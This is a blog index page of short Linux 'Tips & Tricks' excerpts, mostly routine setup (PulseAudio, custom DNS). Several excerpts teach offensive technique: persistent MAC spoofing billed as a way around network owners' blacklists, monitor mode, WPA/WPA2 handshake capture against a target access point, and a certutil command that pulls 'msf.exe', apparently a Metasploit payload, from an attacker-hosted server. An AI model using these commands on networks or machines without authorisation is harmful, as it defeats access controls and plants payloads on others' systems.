Avatar Image
Gajendra Mahato
Tips & Tricks Cover

Spoofing MAC Address in a Persistent fashion

This method allows users to change their WiFi adapter’s MAC address persistently. It also enables users to bypass MAC address blacklisting by network owners, as it allows connection to WiFi networks with a spoofed MAC address. Step 1: Writing a systemd Service Create a systemd service to change your MAC address and place it in the /etc/systemd/system/ directory with the name mac-spoofer.service. cat /etc/systemd/system/mac-spoofer.service [Unit] Description=MAC Address Change/spoofing wlo1 Wants=network-pre.target Before=network-pre.target BindsTo=sys-subsystem-net-devices-wlo1.device After=sys-subsystem-net-devices-wlo1.device [Service] Type=oneshot User=root ExecStart=/usr/bin/ifconfig wlo1 down ExecStart=/usr/bin/macchanger -r -b wlo1 ExecStart=/usr/bin/ifconfig wlo1 up [Install] WantedBy=multi-user.target Step 2: Creating a Dispatcher Script Create a script in the /etc/NetworkManager/dispatcher.d/ directory and grant it executable permission. This directory contains scripts to handle various network-related events, which are automatically executed in response to specific events managed by NetworkManager. ...

January 13, 2026 · 2 min
Tips & Tricks Cover

Switch Back to PulseAudio

Title: Disable Pipewire Audio Service To disable the Pipewire audio service, run the following commands: systemctl --user disable pipewire pipewire.socket systemctl --user mask pipewire pipewire.socket systemctl --user enable --now pulseaudio.service Uninstalling Pipewire To uninstall Pipewire, you can use the following command: paru -Rdd pipewire-pulse pipewire-support pipewire-alsa Installing Pulseaudio To install Pulseaudio, run: paru -S pulseaudio-alsa pulseaudio-bluetooth pulseaudio-equalizer-ladspa pulseaudio-jack pulseaudio-lirc pulseaudio

January 13, 2026 · 1 min
Tips & Tricks Cover

Table of Contents

Airmon-ng To start monitoring mode on wlan0: sudo airmon-ng start wlan0 iwconfig To enable monitor mode using iwconfig: sudo ifconfig [INTERFACE] down sudo iwconfig [INTERFACE] mode monitor sudo ifconfig [INTERFACE] up iw To enable monitor mode using iw: sudo ip link set [INTERFACE] down sudo iw [INTERFACE] set monitor control sudo ip link set [INTERFACE] up Adding a New Monitor Interface To add a new monitor interface: sudo iw [INTERFACE] interface add [NEW_INTERFACE] type monitor Aircrack-ng Installation To install aircrack-ng: sudo apt-get update sudo apt-get install aircrack-ng Airmon-ng Commands To use airmon-ng commands: ...

January 13, 2026 · 1 min
Tips & Tricks Cover

Tutorial: Downloading Files from Linux to Windows Using Windows CLI

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...

January 13, 2026 · 2 min
Tips & Tricks Cover

Wi-Fi Handshake Capture Guide using aircrack-ng Tools

🔍 1. Scan Available WiFi Networks 🌐 Scan all nearby WiFi networks sudo airodump-ng mon0 📶 Scan only 2.4 GHz networks (802.11b/g) sudo airodump-ng --band bg mon0 📡 Scan only 5 GHz networks (802.11a) sudo airodump-ng --band a mon0 📋 Band Option Summary --band a → 5 GHz (802.11a) --band b → 2.4 GHz (802.11b) --band g → 2.4 GHz (802.11g) --band bg → All 2.4 GHz (recommended) --band abg → Both 2.4 GHz and 5 GHz 🎯 2. Capture WPA/WPA2 Handshake 🎯 Start listening on target AP # Replace <channel>, <BSSID>, and <output_filename> sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_filename> mon0 Example ...

January 13, 2026 · 2 min
Tips & Tricks Cover

Configure Custom DNS Servers in Arch based Linux.

First of all, check openresolv package is installed in your system or not. if not then simply install it by: sudo pacman -S extra/openresolv Step 2: Remove Immutable Permissions # Check for immutable permissions on /etc/resolv.conf lsattr /etc/resolv* # If immutable permissions exist, them remove it by sudo chattr -i /etc/resolv.conf Step 3: Set Custom DNS Servers # Edit the resolvconf.conf file sudo nano /etc/resolvconf.conf # Configuration for resolvconf(8) # See resolvconf.conf(5) for details resolv_conf=/etc/resolv.conf # If you run a local name server, you should uncomment the below line and # configure your subscribers configuration files below. #name_servers=127.0.0.1 ###### Block malware with 1.1.1.1 for Families ##### name_servers=1.0.0.2 name_servers=1.1.1.2 ###### Use 1.1.1.1 resolver ###### name_servers=1.0.0.1 name_servers=1.1.1.1 ###### AdGuard DNS ###### # name_servers=94.140.14.59 # name_servers=94.140.14.49 ######### AdGuard Non-filtering DNS ####### name_servers=94.140.14.141 name_servers=94.140.14.140 Enable dhcpcd services to work Custom DNS. if it is not installed in your system then install it by sudo pacman -S extra/dhcpcd sudo systemctl enable --now dhcpcd.service Conclusion: You’ve successfully configured custom DNS servers on Arch based Linux. Enjoy improved network security and privacy with your chosen DNS servers. ...

January 13, 2024 · 1 min